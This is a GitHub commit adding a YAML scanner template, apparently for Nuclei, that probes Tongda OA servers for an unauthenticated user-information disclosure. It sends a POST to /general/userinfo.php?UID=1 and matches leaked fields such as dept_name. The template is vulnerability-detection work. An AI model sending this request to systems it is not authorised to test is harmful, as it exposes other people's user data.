Merge pull request #4080 from ritikchaddha/patch-20

Create tongda-user-session-disclosure.yaml
patch-1
Prince Chaddha 2022-04-10 01:10:41 +05:30 committed by GitHub
commit fb3b587f8d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 32 additions and 0 deletions

View File

@ -0,0 +1,32 @@
id: tongda-session-disclosure
info:
name: Tongda User Session Disclosure
author: ritikchaddha
severity: medium
reference: https://mp.weixin.qq.com/s/llyGEBRo0t-C7xOLMDYfFQ
tags: tongda,disclosure
requests:
- method: POST
path:
- "{{BaseURL}}/general/userinfo.php?UID=1"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"dept_name":"'
- '"online_flag":'
condition: and
- type: word
part: header
words:
- "application/json"
condition: and
- type: status
status:
- 200